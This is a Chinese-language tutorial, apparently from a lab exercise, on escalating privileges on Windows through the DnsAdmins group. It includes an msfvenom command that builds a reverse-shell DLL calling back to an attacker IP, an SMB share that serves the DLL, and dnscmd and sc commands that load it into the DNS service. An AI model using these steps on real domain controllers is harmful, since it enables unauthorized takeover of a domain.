windows privilege escalate: DnsAdmins Group

Posted on | In
Words count in article: 1.2k | Reading time ≈ 7

简介

通过DnsAdmins用户组可写入恶意dll,重启dns服务器即可执行恶意dll。

漏洞产生的原因

DnsAdmins用户组官方介绍

查看用户所在的用户组

  • 1.输入net user <usernaame> /domain,查看
  • 2.输入whoami /groups查看
net user
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ net user yran /domain
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/6/2020 3:08:02 PM
Password expires             Never
Password changeable          6/7/2020 3:08:02 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   6/5/2020 10:16:17 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.

用户所在的组为:Domain Users、Contractors

whomi /groups
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

用户所在的组:Everyone、Users、Pre-Windows 2000 Compatible Access、Remote Management Users、NETWORK、Authenticated Users、This Organization、Contractors、DnsAdmins、NTLM Authentication

从两条命令的输出发现,域用户组的数量不一致,net user可以查看到全局用户组Domain Users,但未查询到本地用户组DnsAdmins

生成恶意DLL文件

1
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.43.100 LPORT=4444 -f dll > privesc.dll

传输dll文件到受害者机器

1
$ sudo python smbserver.py <shareName> <path/of/share>

启动smb服务后,在本地使用smbclient尝试访问smb服务,查看是否可以成功访问

1
$ smbclient -L <target ip> --no-pass

注入dll文件提权

修改配置

查看主机名hostname

1
2
3
$ dnscmd <FQDN of DC or servername> /config /serverlevelplugindll \\UNC_path
eg:
$ dnscmd testmachine.test.local /config /serverlevelplugindll \\192.168.43.100\share\privesc.dll

检查配置是否写入成功

1
2
PS C:\> Get-ItemProperty
HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

重启dns服务

sc.exe后跟的servername需要加\\前缀

1
2
$ sc.exe <FQDN of DC> stop dns
$ sc.exe <FQDN of DC> start dns

dnscmd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd

Usage: DnsCmd <ServerName> <Command> [<Command Parameters>]

<ServerName>:
  IP address or host name    -- remote or local DNS server
  .                          -- DNS server on local machine
<Command>:
  /Info                      -- Get server information
  /Config                    -- Reset server or zone configuration
  /EnumZones                 -- Enumerate zones
  /Statistics                -- Query/clear server statistics data
  /ClearCache                -- Clear DNS server cache
  /WriteBackFiles            -- Write back all zone or root-hint datafile(s)
  /StartScavenging           -- Initiates server scavenging
  /IpValidate                -- Validate remote DNS servers
  /EnumKSPs                  -- Enumerate available key storage providers
  /ResetListenAddresses      -- Set server IP address(es) to serve DNS requests
  /ResetForwarders           -- Set DNS servers to forward recursive queries to
  /ZoneInfo                  -- View zone information
  /ZoneAdd                   -- Create a new zone on the DNS server
  /ZoneDelete                -- Delete a zone from DNS server or DS
  /ZonePause                 -- Pause a zone
  /ZoneResume                -- Resume a zone
  /ZoneReload                -- Reload zone from its database (file or DS)
  /ZoneWriteBack             -- Write back zone to file
  /ZoneRefresh               -- Force refresh of secondary zone from master
  /ZoneUpdateFromDs          -- Update a DS integrated zone by data from DS
  /ZonePrint                 -- Display all records in the zone
  /ZoneResetType             -- Change zone type
  /ZoneResetSecondaries      -- Reset secondary\notify information for a zone
  /ZoneResetScavengeServers  -- Reset scavenging servers for a zone
  /ZoneResetMasters          -- Reset secondary zone's master servers
  /ZoneExport                -- Export a zone to file
  /ZoneChangeDirectoryPartition -- Move a zone to another directory partition
  /ZoneSeizeKeymasterRole    -- Seize the key master role for a zone
  /ZoneTransferKeymasterRole -- Transfer the key master role for a zone
  /ZoneEnumSKDs              -- Enumerate the signing key descriptors for a zone
  /ZoneAddSKD                -- Create a new signing key descriptor for a zone
  /ZoneDeleteSKD             -- Delete a signing key descriptor for a zone
  /ZoneModifySKD             -- Modify a signing key descriptor for a zone
  /ZoneValidateSigningParameters -- Validate DNSSEC online signing parameters for a zone
  /ZoneSetSKDState           -- Set Active and/or Standby keys for a signing key descriptor for a zone
  /ZoneGetSKDState           -- Retrieve dynamic state for a signing key descriptor for a zone
  /ZonePerformKeyRollover    -- Trigger a key rollover in a signing key descriptor for a zone
  /ZonePokeKeyRollover       -- Trigger a key rollover in a signing key descriptor for a zone
  /ZoneSign                  -- Signs the zone using DNSSEC online signing parameters
  /ZoneUnsign                -- Removes DNSSEC signatures from a signed zone
  /ZoneResign                -- Regenerate DNSSEC signatures in a signed zone
  /EnumRecords               -- Enumerate records at a name
  /RecordAdd                 -- Create a record in zone or RootHints
  /RecordDelete              -- Delete a record from zone, RootHints or cache
  /NodeDelete                -- Delete all records at a name
  /AgeAllRecords             -- Force aging on node(s) in zone
  /TrustAnchorAdd            -- Create a new trust anchor zone on the DNS server
  /TrustAnchorDelete         -- Delete a trust anchor zone from DNS server or DS
  /EnumTrustAnchors          -- Display status information for trust anchors
  /TrustAnchorsResetType     -- Change zone type for a trust anchor zone
  /EnumDirectoryPartitions   -- Enumerate directory partitions
  /DirectoryPartitionInfo    -- Get info on a directory partition
  /CreateDirectoryPartition  -- Create a directory partition
  /DeleteDirectoryPartition  -- Delete a directory partition
  /EnlistDirectoryPartition  -- Add DNS server to partition replication scope
  /UnenlistDirectoryPartition -- Remove DNS server from replication scope
  /CreateBuiltinDirectoryPartitions -- Create built-in partitions
  /ExportSettings            -- Output settings to DnsSettings.txt in the DNS server database directory
  /OfflineSign               -- Offline signing zone files, including key generation/deletion
  /EnumTrustPoints           -- Display active refresh information for all trust points
  /ActiveRefreshAllTrustPoints -- Perform an active refresh on all trust points now
  /RetrieveRootTrustAnchors  -- Retrieve root trust anchors via HTTPS

<Command Parameters>:
  DnsCmd <CommandName> /? -- For help info on specific Command

In future versions of Windows, Microsoft might remove dnscmd.exe.

If you currently use dnscmd.exe to configure and manage the DNS server,
Microsoft recommends that you transition to Windows PowerShell.

To view a list of commands for DNS server management, type
"Get-Command -Module DnsServer" at the Windows PowerShell prompt. Additional
information about Windows PowerShell commands for DNS is available at
http://go.microsoft.com/fwlink/?LinkId=217627.
owefsad wechat
进击的DevSecOps,持续分享SAST/IAST/RASP的技术原理及甲方落地实践。如果你对 SAST、IAST、RASP方向感兴趣,可以扫描下方二维码关注公众号,获得更及时的内容推送。
0%